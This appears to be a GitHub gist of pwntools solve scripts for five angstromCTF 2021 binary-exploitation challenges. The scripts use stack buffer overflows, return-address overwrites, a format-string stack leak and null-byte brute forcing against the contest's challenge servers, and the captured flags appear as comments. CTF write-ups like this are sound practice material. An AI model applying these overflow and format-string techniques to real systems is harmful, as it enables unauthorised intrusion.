Skip to content

Instantly share code, notes, and snippets.

@blackbeard666
Last active April 8, 2021 14:12
Show Gist options
  • Save blackbeard666/f176e4d8b22e6a38886a3541605afbf0 to your computer and use it in GitHub Desktop.
Save blackbeard666/f176e4d8b22e6a38886a3541605afbf0 to your computer and use it in GitHub Desktop.
ANGSTROM 21 PWN SCRIPTS (solved the four easy ones, saving the other challs I worked on but were solved by the other pwn guys from ARESx here)
from pwn import *
#: CONNECT TO CHALLENGE SERVERS
binary = ELF('./raiid_shadow_legends', checksec = False)
#libc = ELF('./libc.so.6', checksec = False)
#p = process('./raiid_shadow_legends')
#p = process('./raiid_shadow_legends', env = {'LD_PRELOAD' : libc.path})
p = remote("shell.actf.co", 21300)
#: GDB SETTINGS
breakpoints = ['break *play', 'break *terms_and_conditions', 'break *play + 493', 'break *play + 178']
#gdb.attach(p, gdbscript = '\n'.join(breakpoints))
#: EXPLOIT INTERACTION STUFF
def game_choice(choice):
print(p.recvuntil(b'do? '))
p.sendline(str(choice))
def send_condition(agreement):
p.sendlineafter(b'conditions? ', agreement)
def send_signature(sign):
p.sendlineafter(b'here: ', sign)
def send_name(name):
p.sendlineafter(b'name: ', name)
#: PWN THY VULNS
game_choice(1)
send_condition(cyclic(4) + p64(1337))
send_condition('yes')
send_signature('SIGNATURE')
send_name('_blackb3ard')
game_choice(2)
p.interactive()
#: actf{great_job!_speaking_of_great_jobs,_our_sponsor_audible...}
from pwn import *
#: CONNECT TO CHALLENGE SERVERS
binary = ELF('./checks', checksec = False)
#libc = ELF('./libc.so.6', checksec = False)
#p = process('./checks')
#p = process('./checks', env = {'LD_PRELOAD' : libc.path})
p = remote("shell.actf.co", 21303)
#: GDB SETTINGS
breakpoints = ['break *main + 159']
#gdb.attach(p, gdbscript = '\n'.join(breakpoints))
#: EXPLOIT INTERACTION STUFF
#: PWN THY VULNS
exploit = b"password123\x00"
exploit += cyclic(80 - (2 * 8))
exploit += p32(17)
exploit += p32(61)
exploit += p32(245)
exploit += p32(55)
exploit += p32(50)
p.sendline(exploit)
p.interactive()
#: Challenge summary: control values in the stack to pass checks
#: actf{if_you_aint_bout_flags_then_i_dont_mess_with_yall}
from pwn import *
#: CONNECT TO CHALLENGE SERVERS
binary = ELF('./login', checksec = False)
#libc = ELF('./libc.so.6', checksec = False)
#: PWN THY VULNS
context.log_level = 'error'
for i in range(1000):
p = process('./login')
p.sendline('\x00')
print(i, p.recvall())
p.close()
#: actf{if_youre_reading_this_ive_been_hacked}
#: JUST BRUTEFORCE AND SEND NULL BYTE TO THE SHELL SERVER
#: https://ctftime.org/writeup/24905
from pwn import *
from Crypto.Util.number import long_to_bytes, bytes_to_long
#: CONNECT TO CHALLENGE SERVERS
binary = ELF('./stickystacks', checksec = False)
#libc = ELF('./libc.so.6', checksec = False)
#: GDB SETTINGS
breakpoints = ['break *vuln + 527']
#gdb.attach(p, gdbscript = '\n'.join(breakpoints))
#: EXPLOIT INTERACTION STUFF
context.log_level = 'error'
#: PWN THY VULNS
flag = b''
for i in range(33, 42):
p = remote("shell.actf.co", 21820)
p.sendline(f"%{i}$p")
tmp = p.recvall().split(b'Welcome, ')[1].strip()
flag += bytes.fromhex(hex(int(tmp.decode(), 16))[2:])[::-1]
p.close()
#: offset 42, which for some reason I can't parse properly
#: i'm too lazy to do it
flag += bytes.fromhex("7d333935663161")[::-1]
print(flag)
from pwn import *
#: CONNECT TO CHALLENGE SERVERS
binary = ELF('./tranquil', checksec = False)
#libc = ELF('./libc.so.6', checksec = False)
#p = process('./tranquil')
#p = process('./tranquil', env = {'LD_PRELOAD' : libc.path})
p = remote("shell.actf.co", 21830)
print(p.recvuntil(b'word: '))
#: GDB SETTINGS
breakpoints = ['break *vuln + 92']
#gdb.attach(p, gdbscript = '\n'.join(breakpoints))
#: EXPLOIT INTERACTION STUFF
#: PWN THY VULNS
p.sendline(b"password123\x00" + cyclic(60) + p64(0x401196))
p.interactive()
#: actf{time_has_gone_so_fast_watching_the_leaves_fall_from_our_instruction_pointer_864f647975d259d7a5bee6e1}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment